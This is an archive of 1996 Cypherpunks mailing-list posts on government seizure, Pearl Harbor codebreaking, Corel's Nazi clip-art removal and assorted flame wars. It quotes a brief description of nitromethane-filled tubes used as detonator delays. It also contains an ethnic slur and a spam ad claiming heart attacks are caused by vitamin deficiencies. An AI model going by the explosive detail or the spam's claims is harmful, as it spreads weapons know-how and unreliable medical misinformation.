> weapons available to the 'victims' in such cases?
> I'm passingly familiar with the Operation Sundevil
> fiasco -- i.e., with the outcome re the principal
> 'charges'.  I'm appalled, however, at the apparent
> lack of remedies for return of such seized property.
> Are individuals who find themselves in such a
> predicament simply at the government's mercy (there's
> an oxymoron for ya)??

Just in case someone replies saying "It's not all that bad", or "It can't
happen here", etc., you should know this:

The United States government has not been responsive to the people for
a long time, but what's become evident in recent years is that they're
also no longer responsive to basic law and order.

They do respond to extreme pressure, as was applied in the Weaver, Waco,
and other similar cases, but, as a general rule, they do whatever they
want all the way to the top of the Justice dept. with impunity.

Example:  George Bush's old pal at the Wash. DC P.R. firm hires the
niece(?) of a Kuwaiti official to testify in front of Congress in full
view of the American people on television, that the Iraquis were throwing
babies out of incubators in Kuwait, thereby securing the necessary votes
in Congress to prosecute the Gulf War.

When it was discovered (after the "war") that the Incubator Baby Scandal
was a lie, nobody was prosecuted.  Further, in blatant violation of the
U.S. Constitution, Bush and Schwartzkopf were knighted by Queen Elizabeth
II of England.

There are also numerous examples of the Justice dept. being caught red-
handed forging documents to frame people for whom they had no evidence or
insufficient evidence to prosecute, and what happens in those cases?
Nothing.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 30 Nov 1996 22:06:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: denial of service and government rights
In-Reply-To: <199612010552.XAA08222@mail.gte.net>
Message-ID: <32A1203E.502B@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Mail Delivery Subsystem wrote:
> ----- The following addresses had delivery problems -----
> <Tired.Fighter@dhp.com>  (unrecoverable error)
> 550 <Tired.Fighter@dhp.com>... User unknown

>    ----- Original message follows -----
> Tired.Fighter@dhp.com wrote:
> > On 30 Nov 96 at 13:10, Black Unicorn wrote:
> > > On Fri, 29 Nov 1996, Greg Broiles wrote:
> > > > I don't see any reason why this wouldn't be true for a
> > > > computer. Fed.Rul.Crim.Pro. 41(b)(1) allows the seizure
> > > > (but seizure is not forfeiture) of "property that
> > > > constitutes evidence of the commission of a
> > > > criminal offense".
> 
> [snip]
> 
> > Please forgive my naivete, but are there no legal
> > weapons available to the 'victims' in such cases?
> > I'm passingly familiar with the Operation Sundevil
> > fiasco -- i.e., with the outcome re the principal
> > 'charges'.  I'm appalled, however, at the apparent
> > lack of remedies for return of such seized property.
> > Are individuals who find themselves in such a
> > predicament simply at the government's mercy (there's
> > an oxymoron for ya)??
> 
> Just in case someone replies saying "It's not all that bad", or "It can't
> happen here", etc., you should know this:
> 
> The United States government has not been responsive to the people for
> a long time, but what's become evident in recent years is that they're
> also no longer responsive to basic law and order.
> 
> They do respond to extreme pressure, as was applied in the Weaver, Waco,
> and other similar cases, but, as a general rule, they do whatever they
> want all the way to the top of the Justice dept. with impunity.
> 
> Example:  George Bush's old pal at the Wash. DC P.R. firm hires the
> niece(?) of a Kuwaiti official to testify in front of Congress in full
> view of the American people on television, that the Iraquis were throwing
> babies out of incubators in Kuwait, thereby securing the necessary votes
> in Congress to prosecute the Gulf War.
> 
> When it was discovered (after the "war") that the Incubator Baby Scandal
> was a lie, nobody was prosecuted.  Further, in blatant violation of the
> U.S. Constitution, Bush and Schwartzkopf were knighted by Queen Elizabeth
> II of England.
> 
> There are also numerous examples of the Justice dept. being caught red-
> handed forging documents to frame people for whom they had no evidence or
> insufficient evidence to prosecute, and what happens in those cases?
> Nothing.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Benjamin Grosman <bgrosman@healey.com.au>
Date: Sat, 30 Nov 1996 04:08:14 -0800 (PST)
To: jonathon <grafolog@netcom.com>
Subject: Re: Announcement: Very Good Privacy
Message-ID: <2.2.32.19961201090304.0075804c@healey.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Dear Sir,

>	I'm not sure how an encryption product that uses encryption
>	algorithms weaker than Pretty Good Privacy can be described
>	as being better than PGP.  
>
>	Especially when all the algorithms listed have known problems
>	of one kind, or another.   << And yes, I know that the known
>	problems -- in some instances --- are entirely theoretical in
>	nature.  >>

What puzzles me is that he included two cyphers that are _extremely_ easy to
break, the vignere cypher and the ascii cypher. Why include these? And what
is his new permutation of RC4 and DES?

Yours Sincerely,

Benjamin Grosman





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Kozubik <kozubik@shoelace.FirstLink.com>
Date: Sat, 30 Nov 1996 22:32:52 -0800 (PST)
To: varange@crl.com
Subject: Re: The Difference Between The Right And Left
In-Reply-To: <Love@22594>
Message-ID: <Pine.SOL.3.91.961130233129.9314A-100000@shoelace.FirstLink.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 	This is, of course, confusing to y'all because your all a
> 	bunch of stupid college kids.

At least we know where to use a contraction............^^^^





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 30 Nov 1996 23:30:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: IPG Algorith Broken!
In-Reply-To: <199611301830.MAA14034@manifold.algebra.com>
Message-ID: <D4q9XD10w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes to Don Wood:
>
> I.e., your bashing of Paul Bradley, for example, may or may not
> concvince me that Paul does not understand cryptography.

However Paul Bradley's own rants, such as the recurrent discussion of
"brute force attacks on one-time pads" should convince everyone that
Paul Bradley doesn't know anything about cryptography and is unwilling
to learn.

As a teacher, I'm used to getting a class full of people who don't know
much about the subject at the beginning of the semester and learn a great
deal about it by the end of the semester. If you've never taught, you
can't imagine the feeling of accomplishment and personal satisfaction that
comes with it.

I get occasional assholes who are unwilling and unable to learn. I've never
seen a gang so dense as the "cypherpunks". Not even on Usenet.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lurker" <lurker@mail.tcbi.com>
Date: Thu, 31 Oct 1996 21:57:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: slander and call for lawyers. :)
Message-ID: <3.0.32.19961031112832.0069d678@mail.tcbi.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:10 AM 10/27/96 -0400, William H. Geiger III wrote:
>In <Pine.SUN.3.94.961026164648.10071G-100000@polaris>, on 10/26/96 at
04:48 PM,
>   Black Unicorn <unicorn@schloss.li> said:
>
>>On Fri, 25 Oct 1996, Dr.Dimitri Vulis KOTM wrote:
>
>>> Sandy Sandfort <sandfort@crl.com> writes:
>>> > 
>>> > On Fri, 25 Oct 1996, Black Unicorn wrote to Dimitri:
>>> > 
>>> > > If you don't watch it I'll have a pair of my staff represent
>>> > > [Ray] free of charge.
>>> > 
>>> > Now THAT would be a community service.
>>> 
>>> Why don't you use the funds pledges for my defunct trip to California
>>> for Ray's lithium bill.
>
>>Suggesting that a person is on a psychoactive mediciation with the
purpose of
>>harming that persons image or character is likely actionable.
>
>>I'd be careful if I were you.  If said individual ever manages to
>>substantiate damages you've got an interesting time ahead of you.
>
>Well as much as it pains me to take Dimitri's side I doubt that any
damages can be
>proved by his statements on this list. My reasoning for this opinion is as
follows:
>
>A.  Dimitri is a nut, kook, ...ect. Definitely suffering from dimished
capacity.
>
>B. Everyone on the list is aware of point A.
>
>C. So with A & B true when Dimitri makes his nutty statements they are
taken by the
>list as just that, nutty statements. 
>
>Under the above I find it hard to see any real damage caused by Dimitri's
statements.
>Granted Dimitri is an anoying pest, I don't think that a lawsuite will do
anything to
>slow him down as I don't see one as winable.

I personally am getting sick of this thread of messages.  I have taken the
steps, as everyone should when annoyed by useless and bothersome threads
and people, to filter this thread and all messages written by Dr DV to the
Trash. (Maybe many of you could do the same.)

I would appreciate it if everyone who has been posting messages with the
above subject (actually 'slander and call for lawyers') please keep the
subject, to save those of us who choose not to listen to this noise from
the hassel of changing our filters.

Thank you for your understanding.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 31 Oct 1996 21:55:18 -0800 (PST)
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: WOW!
In-Reply-To: <o669VD4w165w@bwalk.dm.com>
Message-ID: <199611010610.AAA00220@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> Ray Arachelian <sunder@brainlink.com> writes:
> > Pledge the rest to an AP fund. :)  I'd say that would be a good use of 
> > the funds.
> I guess one can always recognize the Armenian heritage by the homicidal
> tendencies...

     I have homicidal tendencies and I don't have an Armenian Heritage.

     HTH, HAND.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 31 Oct 1996 22:09:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: WWII & Japan (fwd)
Message-ID: <199611010610.AAA03470@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Dear Sir,
> 
> >Japanese Ambassador Kichisaburo Nomura and Special Ambassador Saburo Kurusu
> >were to present Secretary of State Cordell Hull a Declaration of War at 1pm
> >Washington time on Dec. 7th. To achieve technical compliance with
> >international rules it was intended to be delivered approx. 30 minutes prior
> >to the actual attack. There were decoding difficulties however and it was
> >delivered after the attack. Neither of the Ambassadors is thought to have
> >had any knowledge of the actual attack and therefore did not understand the
> >criticality of delivery. Japan intended to go to war with the United States,
> >Great Britian, and Holland over their policies concerning the Japanese
> >presence in China and Manchuria.
> 
> This is totally true, except that the American forces actually knew that an
> attack was coming, and the Japanese ambassadors definitely had an inkling of
> what was going to happen. Communicades to the Japanese ambassadors were
> being made sparse as the attack came, and details of actions to come were
> broken up into a 14 part message.

Roosevelt and close advisors were aware that Japan was on the brink of war,
as was Britian, and many civilians predicted it. They had no idea of exactly
where. The US Navy issued the last war warning on Nov. 27, 1941 based on
MAGIC intercepts. These intercepts hinted at action in Borneo, The Kra
Peninsula, or the Phillipines. At no place in any of the MAGIC intercepts was
Hawaii mentioned. In war knowing that something is going to happen without
knowing where is less than worthless because it causes you to spread your
forces too thin and reduces force reaction time. I have studied WWII
specificaly for over 30 years both historicaly and through various wargames.
What those people were asked to do they did as best they could with what
they had.

I would be interested in your source for the claim the two Ambassadors were
aware of the impending declaration. Both official Japanese documents as well
as personal memoranda refute this. Had they known a priori of what was going
to happen they would have made much greater strides to conform to the 30
minute international standard for declarations of war. The Japanese take
'face' with great gravity. They had no intention of going down as the
instigator of the day that will live in infamy. Their intention was to
declare war and impliment its first actions in a time frame that was most
favorable for them, it was not to blind side the US.

> On the USA side, the even knew that the
> attack was coming on a Sunday. They had broken the Japanese codes, and had
> been distributing the information from the communicades to pertinent
> authorities.

Only the MAGIC codes were broken. The Japanese Navy used JN-25 which the US
could decrypt only about 10% of the time. On Dec. 1, 1941 the Japanese
switched to JN-25b which brought their decoding efforts to a complete stop.
The "Climb Mount Niitaka" code phrase authorizing the strike on Pearl Harbor
occured on Dec. 2, 1941. It was sent using JN-25b and did not appear in any
MAGIC intercepts. It is therefore unreasonable to claim they knew before
hand what day it would occur on when the exact date had not even been
picked until such time that there was no way they could determine it.

> However, a copy of a communicade was found in a rubbish bin in
> the hallway of a military building, and so distribution was reduced to fewer
> people.

This is a WWII myth.

>From the beginning of November the US Navy suspected the Japanese Navy was
up to something. This was based on submarine tracking reports, radio traffic
analysis, as well as the fact that the aircraft carriers locations were
completely lost. Again they knew something was up, just not where. The best
course of action in such a situation is to do as little as possible. Not
only does this husband your force but it provides as small a signature to
the enemy as possible that you are even aware that something is up.

The Japanese Samurai have a saying about war, "He who makes the first move
is the loser".

> But nobody wanted to take any notice.

During November Lt. Gen. W.C. Short, commanding the army units in Hawaii,
and CINCPAC Adm. Husband Kimmel began to take steps to counter sabotage as
well as a direct attack. Their major problems were lack of training and
sufficient resources. One of the reasons the planes were lined up was
because this was SOP for anti-sabotage security. Based on MAGIC and the
other hints they got (eg radio intercept from Tokyo to Berlin hinting at
action in early Dec. against the US and allies) Hawaii was not considered a
primary target. It was felt that 3rd-column action was much more likely than
direct attack. Another good example were the B-17's which were destroyed
during Pearl Harbor as well as the seaplane tender base. Both of these were
intended to strengthen the ability of the Pacific forces to withstand attack
and go on the offensive. They just went into action too little and too late.
The biggest tactical mistake was the Japanese in not ordering a 3rd wave to
take out the fuel stores, Army facilities, and finish the airstrips.

Let's look at this realisticly. The first real inkling all hell was going to
break loose occured in early Nov. and the attack actualy took place in early
Dec. This means we are expecting the forces to respond from normal peace
time footing to full war time footing in 30 days. Not what I would call
feasible considering the level of stores available at the time. The US could
not meet such a time table today during Desert Storm, why should we accept
the premise they could have done it then as valid?

> This begs the question of the
> illegal lend-lease agreements between the Americans and the British which
> could have had Roosevelt impeached if the details had come to light in congress.

This is opinion not fact. Roosevelt introduced the bill to Congress in
January of 1941. Congress made the act law on March 11, 1941 with an initial
authorization for $7 Billion to any nation. The motivation behind it was the
fact that the US had removed from S. Africa 42 Million Pounds which was
Englands last negotiable asset. The fact is that they were broke and the
US was determined not to let that fact get in the way. It was clearly in our
self interest not to let England or any other country simply founder before
the Axis for a few bucks.

Consider, England was broke and Germany/Italy were doing quite well. The US
was at war with Japan. Japan had limited resources (eg 3-4 months crude oil
reserves at the time of Pearl Harbor, hardly sufficient for a full blown
war). The US was in absolutely no danger of going broke or running out of
resources or means to impliment their strategy. Because of this it was
agreed that Europe should be the theatre of primary concern, not the
Pacific. Had I been tasked with such a decision I suspect I would have made
the same one. I would have left the initial forces there to fend for
themselves as best they could and focus my forces on the target with the
greatest payoff in the short term.

> However, as to the reason why the Japanese wanted to go to war, your
> explanation is a little basic. It is true that the Japanese wanted to go to
> war over the aforementioned countries policies concerning the Japanese
> invasion and occupation of Manchuria, or Manchukuo as they called it.
> However, this was not simply the reason. The aforementioned countries
> policies barred export of vital natural resources to the Japanese, who live
> in a naturally mineral poor country. Their original invasion was actually
> staged (see "The Manchukuo Incident") in the hope that they could gain more
> natural resources from Manchukuo. 

Japans reasons for going to war were quite varied and entirely unsuitable
for further discussion on this list. However, if you would like further
information based on Japanese documents there is a book called 'The Setting
Sun' which covers the Japanese POV quite well. I unfortunately can't find my
copy and don't remember its author (John Toland?). It is currently available.

> Another reason why the Japanese wanted war is a rather complicated one, and
> it dates back to the end of World War I. At the end of the war most
> countries in a position to have colonies in the pacific/orient area were
> under severe financial stress. The French had borrowed so much money from
> the USA that they had doubts of ever being able to count so high, and
> Clemenceau, the "French Tiger", was determined to extract as much
> reparations under the War Guilt Clause of the Versailles Treaty as possible.
> The British had also borrowed phenomenal amounts of money. However, these
> two, after taking all territorial possessions of the ex-German Empire, and
> the ex-Austrian Empire, had in fact huge amounts of possessions. The British
> Empire spanned roughly a third of the world in both population and size, and
> the French were roughly two thirds as big as the British. But how to pay for
> this massive Empire? Maintance of ships, particularly the newer Dreadnought
> class Battleships, was incredibly expensive, and enough were not in
> possession at the end of the war to defend pre-war borders, let alone the
> newly expanded ones. Thus the British Empire, and the USA decided that it
> was best to maintain the status quo. They had "run the race" and won. They
> had their colonies (the USA had the Phillipines, and a few other pacific
> islands, although the USA has always had a policy against Colonialism), and
> they decided to end the possibility of another arms race via an agreement.
> Thus it was that the Washington Naval Conference was formed. This conference
> limited certain countries to certain ratio's of certain classes of ships, to
> help maintain the status quo, and all measurements were done against the
> British Navy. It was this conference and the forged agreement that came out
> of it that greatly crippled Japan, in desperate need of Colonies and the
> natural resources that could be exploited from them, for Japan was limited
> to a navy roughly half the size of the British Navy, but consisting of
> mainly smaller ships overall, for their quote of battleships was less than
> half. Holland and France were also participating countries in this pact.
> However, whilst it limited ships in the pacific regions, it did not limit
> ships in other regions. This crippled Japan, but left _all other players_
> with other waters in which to build ships (hence the large buildup of
> Atlantic sea forces by the USA that facilitated the lend-lease agreements
> later on). This in itself a heavy blow to the Japanese, but added to this
> was the failure of the British to renew their alliance. Not only was the
> most powerful empire in the world now not an ally of the Japanese, but the
> Japanese could not even compete to provide what they needed. And the other
> countries, naturally, liked this just fine.

There are several points here that as presented are not sufficiently well
described to explain what was going on with the various force limiting
treaties being put in place. "Blood, Tears, and Folly" by Len Deighton has a
quite good explanation of the dynamics of these events. The book also has a
continous description of various aspects of crypto and WWII.

> Therefore, whilst your comments are true, they are only true in part. The
> Japanese ambassadors certainly had a general idea as to what was following
> due to the 14 part message, and the Japanese had more motive to attack than
> a simple "policy of other countries" explanation warrants.

The first comment is true of all things and provides no method for further
exploration of historical events. It in fact is an a priori assumption in any
research. 

The Ambassadors had no clear inkling until after they had gotten the
dispatch decoded in toto (which they didn't do themselves but left to a
consular staff member).


                                                         Jim Choate


ps I am subscribed to the cpunks list, there is absolutely no reason to
   send me personal responces to this discussion that are then sent to
   the list. I do not wish to receive any private invitations for
   discussion of this topic.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 31 Oct 1996 23:15:41 -0800 (PST)
To: dh12@dial.pipex.com
Subject: Re: 'what cypherpunks is about'
In-Reply-To: <199610260031.BAA13872@typhoon.dial.pipex.net>
Message-ID: <199611010730.BAA00546@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


Mr. Hassen wrote:
> But remember people are NOT sheep and nothing
> lasts forever.

     Yes, they are, and death does. 

     Loans to third world counties are made (obstensively) to help industry
and farming to be developed, and to improve the conditions of the people. It 
rarely works that way, and I think it is a wasted effort, but it is better 
than nothing. 

     And yes, I do believe that those _are_ the reasons (at least on of the
reasons, others include making sure that markets are open, etc.), and no,
I don't believe in the tooth fairy. 

     I would imagine that the repayment rates (i.e. number of defaults) is 
about the same as the student loan program, and the money used about 
as wisely. This from someone who went $30,000 in debt for student loans 
to go to Art School...

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 31 Oct 1996 22:58:25 -0800 (PST)
To: "Matthew J. Miszewski" <mjmiski@execpc.com>
Subject: Re: Looking for post on possible Law Articles
In-Reply-To: <199611010310.VAA16259@mail.execpc.com>
Message-ID: <Pine.SUN.3.94.961101015645.12219A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 31 Oct 1996, Matthew J. Miszewski wrote:

> Sorry to take up bandwidth, but I swore I saw a post from someone 
> outlining (for what seemed to be a class) a series of legal questions 
> regarding the net.  I was almost positive it came across my 
> cypherpunks folder.
> 
> If anyone remembers this, or better yet still has the post, could you 
> send it or a pointer my way?  

It's Professor Post's class outline.
I don't have a URL handy.

> 
> Thanks in advance.
> 
> Matt
> -----BEGIN PGP PUBLIC KEY BLOCK-----
> Version: 2.6.2
> 
> mQCNAzDq+FoAAAEEANM9+JcJmUp4aCSGpdOG4Y1b6m4630XA8H41Utbvr7Tr6wEH
> CD6tlxZ+k+Pycj4w/f8WQa8fC50skoLjUNeP4lYsR7NYaMGRp6WkqCLMI/3Nohvk
> pfLDqnzZZdwVL2liB7mfTURoF6doQaVehHmMBjSaVTfD12tzNGm6VvyEc77JAAUR
> tClNYXR0aGV3IEouIE1pc3pld3NraSA8bWptaXNraUBleGVjcGMuY29tPg==
> =lkx1
> -----END PGP PUBLIC KEY BLOCK-----
> 

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jamyang Gyatso <chualoon@iscs.nus.sg>
Date: Thu, 31 Oct 1996 18:26:26 -0800 (PST)
To: Alan <TheShadow@nym.alias.net>
Subject: Re: Cracked DES?
In-Reply-To: <327fd332.72607607@smtp.ix.netcom.com>
Message-ID: <Pine.SOL.3.94.961101101745.10347D-100000@elc07.iscs.nus.sg>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 31 Oct 1996, Alan wrote:

> This was in the 10/28 issue of Network World Infusion.  Did anyone else
> see it?
> 
> 	Two eminent Israeli cryptographers last week sent a shock wave
> 	through security circles with the announcement that they had
> 	figured out a way to extract private Data Encryption Standard
> 	(DES) encryption keys from such things as PCs and smart cards.

		[ snip ]

....... Yes.  I saw it in the local papers today.

	A team from ISS also found that smart cards could be hacked
	by subjecting it to some radiation and comparing error messages
	with the real ones using mathematical models.

	



         Chua Loong Koon        ____     National University 
             Edmund          _.'    "       of Singapore 
      _____________________ | .. o  | _________________________
    / chualoon@iscs.nus.sg  |/ |    |/ isc50045@leonis.nus.sg  \
   |             http://www.iscs.nus.sg/~chualoon               |
   (	        "If you want change, be the change"             )
   (       finger chualoon@decunx.iscs.nus.sg for PGP key       )
    \/^\/^\/^\/^\/^\/^\/^\/-- /______\ --\/^\/^\/^\/^\/^\/^\/^\/ 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBMnlfgY+i+MjeWkMRAQHWUQQA4E+W3CRFQyV9VfOX+5TKy2UR4+Ktx7XY
z3SBM4q1e/9LseyZatY9FEHG8PWPJjkagfhZjL6gdHiXqskmE6Cap3mbApXgbr8K
KmUMhh2E0Ro2JOsY8LDZkZPEauybPw0OGWT/qi2vVYKjeHpZ7wlsVtpOb+fO2arw
qt/KZzW3Ysw=
=wuHe
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 20 Feb 1996 03:19:31 +0800
To: cypherpunks@toad.com
Subject: Re: Easy Nuclear Detonator
In-Reply-To: <m0toNuM-00091OC@pacifier.com>
Message-ID: <uX47yD11w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com> writes:
> "Multiple very thin flexible hollow tubes (1 mm ID? teflon?) filled with a
> homogenous liquid
> explosive (for example, pure nitromethane), length accurately cut to produce
> the exactly desired delay. ...

Sounds good!

Now that coderpunks have split off of cypherpunks, I propose the creation of
at least two more mailing lists on toad.com (to keep the traffic on the
original cypherpunks more in line with Perry's views of what's appropriate):

* nukepunks - for educating the public how to build nuclear weapons
 (discussions of refining U-232 in your garage and the like)

* chempunks - for educating the public how to build chemical weapons
 (how to make Cyclon-B out of common household chemicals)

   :-)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Murray Hayes" <mhayes@infomatch.com>
Date: Sun, 1 Dec 1996 03:17:44 -0800 (PST)
To: "varange@crl.com>
Subject: Re: The Difference Between The Right And Left
Message-ID: <199612011117.DAA25434@infomatch.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Nov 1996 22:47:06 -0800, Troy Varange wrote:

>	The French Revolution perhaps provided the best
>	definition as the origional coiners of the terms.
>
>	The Left is for radical change and the Right is for
>	evolutionary change.

     The Jacobin (sp) sat on the left side while the other guys
(I forget their names) sat on the right.  Of course both used to
be on the left before they klled everyone on the right after
which an expansion of sorts happened to fill the seats.  I 
think the event was called the night of the long knives?


>
>	That would put mainstream politics decidedly on the right
>	wing side of the political spectrum.

I would have thought main stream would have been in the middle.

>	The left wing is a rather motly collection including many
>	anarchists, communists and nazis, yet many of the same
>	types are decidedly right wing.


mhayes@infomatch.com

It's better for us if you don't understand
It's better for me if you don't understand
                                             -Tragically Hip





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sun, 1 Dec 1996 05:12:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Detweiller spotted?
Message-ID: <199612011258.EAA08939@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn said:

>Now that's what I call amazing.  Maybe I could rewrite PGP
>tomorrow (hee hee).

Is anyone else hearing a familiar (and again, constant) voice from the past?

Maybe I'm wrong, but has anyone met him in person?
Just asking.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sun, 1 Dec 1996 08:28:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: COREL TO CENSOR ALL CLIP ART WORLDWIDE
Message-ID: <199612011618.IAA11579@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Swastikas halt Corel sales
By Reuters
November 25, 1996, 12 p.m. PT

    MUNICH, Germany--Corel (COSFF) software company
    has temporarily halted sales of its top-selling Corel Draw
    graphics program in Germany because it includes four
    banned Nazi symbols, a company spokesman said today.

    The Canadian company will remove three drawings of Adolf
    Hitler and one swastika from future versions of its popular
    software, spokesman Thomas Layer said.

    It is also distributing warning labels to be placed on versions
    now being sold, Layer said. The label warns that the
    "improper use of digital images and symbols" found in the
    programs Corel Draw 4.0, 5.0, and 6.0 is prohibited in
    Germany, which bans public displays of Nazi symbols.

    Munich's state prosecutor launched an investigation into
    the software on October 2 after learning that someone had
    used the banned images to print business cards for a
    neo-Nazi group, Layer said.

    This is not the first time that the company has had complaints
    due to their clip art images.  In 1992, pressure from US Black
    rights organisations forced drawings of the Ku Kux Klan to be
    removed from the collection.

    Consideration is also being given to the removal of other images
    from the collection, either due to legal restrictions in
    various countries, or due to complaints from organisations
    such as the Simon Wiesenthal Center.  Images considered for
    removal include a burning US flag, Josef Stalin, the Star of
    David icon, a cannabis leaf, and a drawing of a woman in a
    bathing costume.

    Corel Draw provides more than 24,000 clip art drawings and
    symbols that computer users can copy. The company
    suspended the sales on November 19.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sun, 1 Dec 1996 08:29:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: COREL TO CENSOR ALL CLIP ART WORLDWIDE
Message-ID: <199612011623.IAA11650@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Swastikas halt Corel sales 
By Reuters
November 25, 1996, 12 p.m. PT 

	MUNICH, Germany--Corel (COSFF) software company
	has temporarily halted sales of its top-selling Corel Draw
	graphics program in Germany because it includes four
	banned Nazi symbols, a company spokesman said today. 

	The Canadian company will remove three drawings of Adolf
	Hitler and one swastika from future versions of its popular
	software, spokesman Thomas Layer said. 

	It is also distributing warning labels to be placed on versions
	now being sold, Layer said. The label warns that the
	"improper use of digital images and symbols" found in the
	programs Corel Draw 4.0, 5.0, and 6.0 is prohibited in
	Germany, which bans public displays of Nazi symbols. 

	Munich's state prosecutor launched an investigation into
	the software on October 2 after learning that someone had
	used the banned images to print business cards for a
	neo-Nazi group, Layer said. 

	This is not the first time that the company has had complaints
	due to their clip art images.  In 1992, pressure from US Black
	rights organisations forced drawings of the Ku Kux Klan to be
	removed from the collection.

	Consideration is also being given to the removal of other images
	from the collection, either due to legal restrictions in
	various countries, or due to complaints from organisations
	such as the Simon Wiesenthal Center.  Images considered for
	removal include a burning US flag, Josef Stalin, the Star of
	David icon, a cannabis leaf, and a drawing of a woman in a
	bathing costume.

	Corel Draw provides more than 24,000 clip art drawings and
	symbols that computer users can copy. The company
	suspended the sales on November 19. 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Troy Varange <varange@crl.com>
Date: Sun, 1 Dec 1996 08:39:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Difference Between The Right And Lefty
In-Reply-To: <Pine.SOL.3.91.961130233129.9314A-100000@shoelace.FirstLink.com>
Message-ID: <199612011625.AA27868@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


> > 	This is, of course, confusing to y'all because your all a
> > 	bunch of stupid college kids.
> 
> At least we know where to use a contraction............^^^^

	See what I mean?  Only a stupid college kid would bother
	pointing that out.

-- 
Cheers!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: All@Internet.Users
Date: Sun, 1 Dec 1996 07:01:01 -0800 (PST)
To: All@Internet.Users
Subject: How long do you want to live?
Message-ID: <199612011436.JAA05575@smtp2.interramp.com>
MIME-Version: 1.0
Content-Type: text/plain


                          HELLO IS ANYONE OUT THERE?

                     HOW LONG DO YOU WANT TO LIVE?

                            WHAT QUALITY OF LIFE?


    First,  imagine this scene.  Your daughter or son is on the phone with
a 911 dispatcher.  Why?  You are lying on the floor in the kitchen,  clutching
your chest,  panic stricken.  You are 45 years old.  In addition to fear,  lots
of things are racing through your mind.  You want to see your children grow
to adulthood.  You want to travel.  You want to enjoy life some more.
Right now though,  you don't know if tomorrow will come.


     FACT:  According to the World Health Organization more than 12 million
                  people die from heart attacks,  strokes and other forms of
                  cardiovascular disease.  THESE DEATHS ARE LARGELY
                  PREVENTABLE.

     FACT:  In the U.S. there are 1500 heart attacks each day;  33% resulting
                  in sudden and premature deaths.  NO SECOND CHANCE!!

     FACT:  Heart attacks and strokes are not diseases.  They are caused by
                  vitamin deficiencies.  America's number one killer can be prevented
                  by an optimum intake of essentials nutrients.

     FACT:  A medical breakthrough has made an old dream of mankind come true.
                  Heart attacks and other forms of cardiovascular disease can essentially
                  become unknown during this generation and forthcoming generations.


     The division I am heading holds the rights to a patented,  non prescription,
non-surgical means to lower cholesterol,  prevent and reverse heart disease. If 
you are interested in adding more life to your yearsnot just more years to your
life,  please call me at: 1-800-741-6240 and leave your name, address and phone
number for more detailed information.  I'd like to ensure you I am not looking for
